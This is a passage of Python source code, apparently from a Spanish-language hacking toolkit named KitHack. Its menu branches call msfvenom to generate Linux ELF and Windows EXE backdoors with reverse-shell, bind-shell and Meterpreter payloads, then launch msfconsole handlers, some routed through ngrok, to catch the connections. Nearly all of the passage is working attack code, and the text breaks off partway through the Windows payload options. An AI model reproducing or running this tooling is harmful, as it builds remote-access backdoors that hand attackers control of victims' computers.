time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p linux/x64/shell_bind_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.elf'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/shell_bind_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/shell_bind_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '06': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p linux/x64/shell_reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.elf'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/shell_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/shell_reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '07': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p linux/x86/meterpreter_reverse_http LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.elf'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x86/meterpreter_reverse_http; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '08': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p linux/x86/meterpreter_reverse_https LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.elf'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x86/meterpreter_reverse_https; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '09': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.elf'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x86/meterpreter_reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '10': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.elf'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x86/meterpreter/reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '11': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p linux/x86/shell_bind_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.elf'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/shell_bind_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x86/shell_bind_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '12': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p linux/x86/shell_reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.elf'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/shell_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x86/shell_reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - else: - print("\n{}[X] OPCION INVALIDA\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('clear') - main() - - elif sys == '02': - print ('{0}\n [*] {1}Select Payload:\n'.format(DEFAULT, GREEN)) - print ('{0}[01]{1} windows/x64/meterpreter_reverse_http'.format(WHITE, YELLOW)) - print ('{0}[02]{1} windows/x64/meterpreter_reverse_https'.format(WHITE, YELLOW)) - print ('{0}[03]{1} windows/x64/meterpreter_reverse_tcp'.format(WHITE, YELLOW)) - print ('{0}[04]{1} windows/x64/meterpreter/reverse_tcp'.format(WHITE, YELLOW)) - print ('{0}[05]{1} windows/x64/powershell_reverse_tcp'.format(WHITE, YELLOW)) - print ('{0}[06]{1} windows/x64/shell_reverse_tcp'.format(WHITE, YELLOW)) - print ('{0}[07]{1} windows/meterpreter_reverse_http'.format(WHITE, YELLOW)) - print ('{0}[08]{1} windows/meterpreter_reverse_https'.format(WHITE, YELLOW)) - print ('{0}[09]{1} windows/meterpreter_reverse_tcp'.format(WHITE, YELLOW)) - print ('{0}[10]{1} windows/meterpreter/reverse_tcp'.format(WHITE, YELLOW)) - print ('{0}[11]{1} windows/meterpreter/reverse_tcp_dns'.format(WHITE, YELLOW)) - print ('{0}[12]{1} windows/metsvc_reverse_tcp'.format(WHITE, YELLOW)) - print ('{0}[13]{1} windows/powershell_reverse_tcp'.format(WHITE, YELLOW)) - print ('{0}[14]{1} windows/shell_reverse_tcp'.format(WHITE, YELLOW)) - - pay = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - pay = pay.zfill(2) - - if pay == '01': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p windows/x64/meterpreter_reverse_http LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.exe'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/x64/meterpreter_reverse_http; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '02': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p windows/x64/meterpreter_reverse_https LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.exe'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/x64/meterpreter_reverse_https; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '03': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.exe'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/x64/meterpreter_reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '04': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.exe'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/x64/meterpreter/reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '05': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p windows/x64/powershell_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.exe'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/powershell_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/x64/powershell_reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '06': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p windows/x64/shell_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.exe'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/shell_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/x64/shell_reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '07': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p windows/meterpreter_reverse_http LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.exe'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione 